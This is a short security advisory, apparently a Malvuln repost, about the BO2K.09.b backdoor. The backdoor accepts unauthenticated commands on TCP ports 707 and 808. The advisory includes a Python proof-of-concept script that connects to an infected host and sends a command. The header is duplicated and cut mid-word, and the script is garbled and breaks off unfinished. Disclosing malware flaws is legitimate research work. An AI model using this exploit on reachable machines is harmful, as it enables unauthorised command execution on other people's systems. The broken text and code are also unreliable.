Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/90894ac48059687ea80e565f7529e53f.txt
Contact: malvuln13@gmail.com
Media: twitter.co Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/90894ac48059687ea80e565f7529e53f.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.BO2K.09.b
Vulnerability: Unauthenticated Remote Command Execution
Description: Backdoor BO2K.09.b listens on TCP ports 707 and 808. Third party adversarys who can reach the system, can execute any command on the infected host using sockets or get a remote shell using telnet, curl etc.
Type: PE32
MD5: 90894ac48059687ea80e565f7529e53f
Vuln ID: MVID-2021-0120
Dropped files:
Disclosure: 03/02/2021
Exploit/PoC:
from socket import *
import time
MALWARE_HOST="x.x.x.x"
PORT=707
CMD="calc
"
def doit():
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST,PORT))
except Exception as e:
print(str(e))
res=""
while True:
res = s.recv(128)
print(res)
if "
" in res or "
Backdoor.Win32.BO2K.09.b Code Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 160